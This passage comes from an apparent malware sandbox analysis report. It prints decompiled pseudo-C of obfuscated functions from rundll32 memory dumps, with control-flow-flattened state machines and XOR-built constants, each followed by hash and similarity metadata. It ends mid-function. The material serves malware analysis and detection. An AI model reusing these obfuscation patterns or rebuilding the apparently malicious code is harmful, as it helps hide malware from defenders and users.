                                                                                                                      				_a16 = _a16 + 0xffffd44e;
                                                                                                                      				_a16 = _a16 | 0x475ceb65;
                                                                                                                      				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                      				_v8 = 0xaf6c6f;
                                                                                                                      				_v8 = _v8 >> 6;
                                                                                                                      				_v8 = _v8 + 0xad29;
                                                                                                                      				_v8 = _v8 + 0xd52;
                                                                                                                      				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                      				_v20 = 0xd79f7b;
                                                                                                                      				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                      				_v20 = _v20 >> 5;
                                                                                                                      				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                      				E00690DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                      				E0068ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                      				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                      				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                      				return _t66;
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =.SG$]O+
                                                                                                                      • API String ID: 0-348654084
                                                                                                                      • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                      • Instruction ID: 78276b60f766109228535e6b6a24794e4aecfb7c8d19227125405f86f5181667
                                                                                                                      • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                      • Instruction Fuzzy Hash: 4921257180120DEFCF45DFE4DA4A8AEBBB1FF45304F208599E92562625C3B19B24DFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0069044F() {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				void* _t309;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				void* _t311;
                                                                                                                      				intOrPtr _t321;
                                                                                                                      				intOrPtr _t325;
                                                                                                                      				void* _t329;
                                                                                                                      				signed int _t331;
                                                                                                                      				signed int _t332;
                                                                                                                      				signed int _t333;
                                                                                                                      				signed int _t334;
                                                                                                                      				signed int _t335;
                                                                                                                      				signed int _t336;
                                                                                                                      				signed int _t337;
                                                                                                                      				signed int _t338;
                                                                                                                      				signed int _t339;
                                                                                                                      				intOrPtr _t369;
                                                                                                                      				void* _t373;
                                                                                                                      				intOrPtr _t374;
                                                                                                                      				void* _t379;
                                                                                                                      				signed int* _t383;
                                                                                                                      
                                                                                                                      				_t383 =  &_v140;
                                                                                                                      				_v16 = 0x8f0e94;
                                                                                                                      				_v12 = 0x9bdfd3;
                                                                                                                      				_t329 = 0;
                                                                                                                      				_v8 = _v8 & 0;
                                                                                                                      				_v4 = _v4 & 0;
                                                                                                                      				_v68 = 0xf0a33d;
                                                                                                                      				_v68 = _v68 ^ 0x64690d06;
                                                                                                                      				_v68 = _v68 >> 7;
                                                                                                                      				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                      				_v96 = 0x45a6c;
                                                                                                                      				_v96 = _v96 + 0xffff2947;
                                                                                                                      				_v96 = _v96 >> 0x10;
                                                                                                                      				_v96 = _v96 ^ 0x00000003;
                                                                                                                      				_v56 = 0xab09eb;
                                                                                                                      				_v56 = _v56 | 0x7e070137;
                                                                                                                      				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                      				_v80 = 0xa0f766;
                                                                                                                      				_v80 = _v80 | 0xafeefcb7;
                                                                                                                      				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                      				_v48 = 0xf26de0;
                                                                                                                      				_v48 = _v48 + 0xffff1ff1;
                                                                                                                      				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                      				_v76 = 0x20d89d;
                                                                                                                      				_v76 = _v76 + 0xffff51c8;
                                                                                                                      				_v76 = _v76 | 0xd50d8457;
                                                                                                                      				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                      				_v136 = 0x1fce72;
                                                                                                                      				_v136 = _v136 >> 0xe;
                                                                                                                      				_v136 = _v136 | 0xd51e44d2;
                                                                                                                      				_t331 = 7;
                                                                                                                      				_v136 = _v136 / _t331;
                                                                                                                      				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                      				_t379 = 0x1e2498b;
                                                                                                                      				_v92 = 0x2fa0bb;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_v92 = _v92 << 1;
                                                                                                                      				_v92 = _v92 ^ 0x0000a534;
                                                                                                                      				_v52 = 0x3913b;
                                                                                                                      				_t332 = 0x4f;
                                                                                                                      				_v52 = _v52 / _t332;
                                                                                                                      				_v52 = _v52 ^ 0x00068b65;
                                                                                                                      				_v104 = 0xfffd78;
                                                                                                                      				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                      				_v104 = _v104 + 0x741e;
                                                                                                                      				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                      				_v104 = _v104 ^ 0x4990882f;
                                                                                                                      				_v84 = 0xe3d15a;
                                                                                                                      				_v84 = _v84 << 8;
                                                                                                                      				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                      				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                      				_v24 = 0xb3d42d;
                                                                                                                      				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                      				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                      				_v60 = 0x6708ad;
                                                                                                                      				_v60 = _v60 + 0xd3fd;
                                                                                                                      				_v60 = _v60 ^ 0x0061923e;
                                                                                                                      				_v128 = 0x5551d4;
                                                                                                                      				_t333 = 0x50;
                                                                                                                      				_v128 = _v128 / _t333;
                                                                                                                      				_t334 = 0x7a;
                                                                                                                      				_v128 = _v128 / _t334;
                                                                                                                      				_t335 = 0x7e;
                                                                                                                      				_v128 = _v128 * 0x46;
                                                                                                                      				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                      				_v28 = 0xd668f8;
                                                                                                                      				_v28 = _v28 << 0x10;
                                                                                                                      				_v28 = _v28 ^ 0x68f34519;
                                                                                                                      				_v112 = 0x194a18;
                                                                                                                      				_v112 = _v112 / _t335;
                                                                                                                      				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                      				_t336 = 0x65;
                                                                                                                      				_v112 = _v112 / _t336;
                                                                                                                      				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                      				_v44 = 0xc79794;
                                                                                                                      				_v44 = _v44 ^ 0x35aba003;
                                                                                                                      				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                      				_v140 = 0x380362;
                                                                                                                      				_t337 = 0x79;
                                                                                                                      				_v140 = _v140 * 5;
                                                                                                                      				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                      				_v140 = _v140 + 0x590f;
                                                                                                                      				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                      				_v120 = 0x1c8328;
                                                                                                                      				_v120 = _v120 / _t337;
                                                                                                                      				_t338 = 0xa;
                                                                                                                      				_v120 = _v120 / _t338;
                                                                                                                      				_v120 = _v120 | 0x9d020d0f;
                                                                                                                      				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                      				_v124 = 0x55cbd6;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 >> 0xc;
                                                                                                                      				_v124 = _v124 >> 6;
                                                                                                                      				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                      				_v132 = 0xf0ac8c;
                                                                                                                      				_v132 = _v132 | 0x3804c269;
                                                                                                                      				_v132 = _v132 >> 1;
                                                                                                                      				_v132 = _v132 + 0xffff8da8;
                                                                                                                      				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                      				_v88 = 0x7992e8;
                                                                                                                      				_v88 = _v88 | 0xba3027fa;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                      				_v36 = 0x7aefbd;
                                                                                                                      				_v36 = _v36 + 0xfffff4eb;
                                                                                                                      				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                      				_v40 = 0xf56b46;
                                                                                                                      				_v40 = _v40 + 0xffff9ce0;
                                                                                                                      				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                      				_v108 = 0x27569f;
                                                                                                                      				_v108 = _v108 + 0x2c0a;
                                                                                                                      				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                      				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                      				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                      				_v116 = 0xbcba21;
                                                                                                                      				_v116 = _v116 << 0xd;
                                                                                                                      				_v116 = _v116 << 8;
                                                                                                                      				_v116 = _v116 >> 6;
                                                                                                                      				_v116 = _v116 ^ 0x011b605a;
                                                                                                                      				_v32 = 0x87c31e;
                                                                                                                      				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                      				_v32 = _v32 ^ 0x05363b16;
                                                                                                                      				_v100 = 0x4be1cd;
                                                                                                                      				_v100 = _v100 + 0xffff13dd;
                                                                                                                      				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                      				_v100 = _v100 >> 7;
                                                                                                                      				_v100 = _v100 ^ 0x01b90151;
                                                                                                                      				_v64 = 0xb1223e;
                                                                                                                      				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                      				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                      				_v72 = 0x9ef2a7;
                                                                                                                      				_v72 = _v72 * 0x66;
                                                                                                                      				_v72 = _v72 + 0xffffefd1;
                                                                                                                      				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t309 = 0x546d98;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							if(_t379 == _t309) {
                                                                                                                      								_t310 =  *0x6a3e00; // 0x0
                                                                                                                      								_t339 = _v56;
                                                                                                                      								_t311 = E00690DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                      								_t383 =  &(_t383[6]);
                                                                                                                      								__eflags = _t311 - _v80;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t379 = 0x64eb485;
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t379 = 0xb6ab68a;
                                                                                                                      									_t329 = 1;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t379 == 0x19763e8) {
                                                                                                                      									_push(_v128);
                                                                                                                      									_push(_v60);
                                                                                                                      									__eflags = E00689462(E0069DCF7(_v24, 0x6817f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                      									_t339 = _v140;
                                                                                                                      									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                      									E0068A8B0(_t339, _t313, _v120);
                                                                                                                      									_t383 =  &(_t383[8]);
                                                                                                                      									L14:
                                                                                                                      									_t369 =  *0x6a3e00; // 0x0
                                                                                                                      									_t309 = 0x546d98;
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									if(_t379 == 0x1e2498b) {
                                                                                                                      										_push(_t339);
                                                                                                                      										_push(_t339);
                                                                                                                      										_t373 = 0x28;
                                                                                                                      										_t321 = E00687FF2(_t373);
                                                                                                                      										 *0x6a3e00 = _t321;
                                                                                                                      										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                      										_t374 =  *0x6a3e00; // 0x0
                                                                                                                      										_t325 = E00687FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                      										_t369 =  *0x6a3e00; // 0x0
                                                                                                                      										_t379 = 0x19763e8;
                                                                                                                      										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                      										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                      										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                      										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                      										 *(_t369 + 4) = _t339;
                                                                                                                      										_t309 = 0x546d98;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t379 == 0x64eb485) {
                                                                                                                      											E00698519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                      											E00698519(_v64, _v72,  *0x6a3e00);
                                                                                                                      										} else {
                                                                                                                      											if(_t379 != 0xb6ab68a) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												E0068957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t329;
                                                                                                                      							L15:
                                                                                                                      							__eflags = _t379 - 0xfde45c5;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 0-2314114710
                                                                                                                      • Opcode ID: 30116ee710ef0730fea70be9125fcb8f9b2c2f4987f2ab418fe1ed3e53fc5c91
                                                                                                                      • Instruction ID: 32aa6a95589a482d0517ed687610c1c550f734fb56b59a7078b8214f4d041c61
                                                                                                                      • Opcode Fuzzy Hash: 30116ee710ef0730fea70be9125fcb8f9b2c2f4987f2ab418fe1ed3e53fc5c91
                                                                                                                      • Instruction Fuzzy Hash: 97E130716083809FD7A8CF25D58A90BFBF2BBC5718F60891DF59A86260C7B1D949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00699EEC() {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				char _v20;
                                                                                                                      				char _v24;
                                                                                                                      				char _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _t207;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				intOrPtr _t212;
                                                                                                                      				intOrPtr _t214;
                                                                                                                      				intOrPtr _t218;
                                                                                                                      				void* _t219;
                                                                                                                      				signed int _t221;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t223;
                                                                                                                      				signed int _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t257;
                                                                                                                      				void* _t259;
                                                                                                                      				char _t263;
                                                                                                                      				void* _t264;
                                                                                                                      				void* _t266;
                                                                                                                      
                                                                                                                      				_v64 = 0xd7ee0e;
                                                                                                                      				_t257 = 0x22;
                                                                                                                      				_v64 = _v64 / _t257;
                                                                                                                      				_v64 = _v64 + 0x89a9;
                                                                                                                      				_t219 = 0;
                                                                                                                      				_v64 = _v64 ^ 0x0000b335;
                                                                                                                      				_t259 = 0xb83ebc6;
                                                                                                                      				_v96 = 0xf5dfb6;
                                                                                                                      				_v96 = _v96 >> 6;
                                                                                                                      				_t221 = 0x26;
                                                                                                                      				_v96 = _v96 / _t221;
                                                                                                                      				_t222 = 0x2d;
                                                                                                                      				_v96 = _v96 * 0x58;
                                                                                                                      				_v96 = _v96 ^ 0x000b9251;
                                                                                                                      				_v60 = 0xd70e95;
                                                                                                                      				_v60 = _v60 >> 9;
                                                                                                                      				_v60 = _v60 + 0xffffe8b9;
                                                                                                                      				_v60 = _v60 ^ 0x00062b78;
                                                                                                                      				_v44 = 0xb641ac;
                                                                                                                      				_v44 = _v44 / _t222;
                                                                                                                      				_v44 = _v44 ^ 0x0002d028;
                                                                                                                      				_v52 = 0xbf8457;
                                                                                                                      				_t223 = 0x5d;
                                                                                                                      				_v52 = _v52 / _t223;
                                                                                                                      				_v52 = _v52 | 0xbb7661a2;
                                                                                                                      				_v52 = _v52 ^ 0xbb710206;
                                                                                                                      				_v80 = 0x47b11a;
                                                                                                                      				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                      				_t224 = 0x18;
                                                                                                                      				_v80 = _v80 / _t224;
                                                                                                                      				_v80 = _v80 + 0xffff1c96;
                                                                                                                      				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                      				_v36 = 0x40dca8;
                                                                                                                      				_v36 = _v36 + 0x3144;
                                                                                                                      				_v36 = _v36 ^ 0x004d2780;
                                                                                                                      				_v40 = 0xec5297;
                                                                                                                      				_v40 = _v40 * 0x45;
                                                                                                                      				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                      				_v72 = 0x18b121;
                                                                                                                      				_v72 = _v72 >> 1;
                                                                                                                      				_v72 = _v72 * 0x1e;
                                                                                                                      				_v72 = _v72 + 0xfd79;
                                                                                                                      				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                      				_v76 = 0xd8cc67;
                                                                                                                      				_v76 = _v76 >> 2;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 * 0x23;
                                                                                                                      				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                      				_v88 = 0x5f1bd9;
                                                                                                                      				_v88 = _v88 + 0x89b3;
                                                                                                                      				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                      				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                      				_v88 = _v88 ^ 0x14801a76;
                                                                                                                      				_v92 = 0x778c42;
                                                                                                                      				_t225 = 0x6d;
                                                                                                                      				_v92 = _v92 * 0x69;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 | 0xba472be1;
                                                                                                                      				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                      				_v56 = 0x5dd318;
                                                                                                                      				_v56 = _v56 / _t257;
                                                                                                                      				_v56 = _v56 << 0xc;
                                                                                                                      				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                      				_v84 = 0xd870dc;
                                                                                                                      				_v84 = _v84 >> 0x10;
                                                                                                                      				_v84 = _v84 | 0x1345b487;
                                                                                                                      				_v84 = _v84 * 0x5a;
                                                                                                                      				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                      				_v48 = 0x9a419e;
                                                                                                                      				_v48 = _v48 | 0xfa3afde2;
                                                                                                                      				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                      				_v32 = 0x7a1ab;
                                                                                                                      				_v32 = _v32 / _t225;
                                                                                                                      				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                      				_v68 = 0x67bbab;
                                                                                                                      				_v68 = _v68 + 0xffffccf8;
                                                                                                                      				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                      				_v68 = _v68 << 0xd;
                                                                                                                      				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                      				_t263 = _v28;
                                                                                                                      				_t258 = _v28;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t266 = _t259 - 0xc23b37f;
                                                                                                                      						if(_t266 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t266 == 0) {
                                                                                                                      							E00698519(_v56, _v84, _v24);
                                                                                                                      							_t259 = 0xdb1153f;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t259 == 0xab8c2) {
                                                                                                                      							_t209 =  *0x6a3e10; // 0x0
                                                                                                                      							E00688ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                      							_t212 =  *0x6a3e10; // 0x0
                                                                                                                      							_t234 = _v16;
                                                                                                                      							_t264 = _t264 + 0xc;
                                                                                                                      							_t219 = 1;
                                                                                                                      							_t259 = 0xc23b37f;
                                                                                                                      							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t259 == 0x26dca52) {
                                                                                                                      							_t234 = _v96;
                                                                                                                      							_t214 = E0068A9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                      							_t258 = _t214;
                                                                                                                      							_t264 = _t264 + 0xc;
                                                                                                                      							if(_t214 == 0) {
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							_t259 = 0xe747a68;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t259 == 0xa9b692f) {
                                                                                                                      							_t263 = E0068F899(_t234);
                                                                                                                      							_t259 = 0x26dca52;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t259 != 0xb83ebc6) {
                                                                                                                      							goto L21;
                                                                                                                      						} else {
                                                                                                                      							_t259 = 0xa9b692f;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if(_t259 == 0xdb1153f) {
                                                                                                                      						E00684E7D(_v48, _v32, _t258, _v68);
                                                                                                                      						_t259 = 0xdb3b1d3;
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      					if(_t259 == 0xe566670) {
                                                                                                                      						_t207 = E0069894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                      						_t264 = _t264 + 0x10;
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t259 != 0xe747a68) {
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      					_t259 = 0xdb1153f;
                                                                                                                      					if(_v28 > 2) {
                                                                                                                      						_t218 = E00684346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                      						_v24 = _t218;
                                                                                                                      						_pop(_t234);
                                                                                                                      						if(_t218 != 0) {
                                                                                                                      							_t259 = 0xe566670;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L1;
                                                                                                                      					L21:
                                                                                                                      				} while (_t259 != 0xdb3b1d3);
                                                                                                                      				L22:
                                                                                                                      				return _t219;
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D1
                                                                                                                      • API String ID: 0-2215811268
                                                                                                                      • Opcode ID: cb62473963271c49ca35199f4abbf7e79df6bb88e7d45ac679e158a895a028de
                                                                                                                      • Instruction ID: 4035a77a3dea0f3b48a3218ef1c40607c98c82d3f079b35ea775a6e798e7d93b
                                                                                                                      • Opcode Fuzzy Hash: cb62473963271c49ca35199f4abbf7e79df6bb88e7d45ac679e158a895a028de
                                                                                                                      • Instruction Fuzzy Hash: 21A162729083008FC758CF65C48940BFBE2BBC4358F148A2EF5A997220D7B5CA498F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0069BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				void* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				signed int _v24;
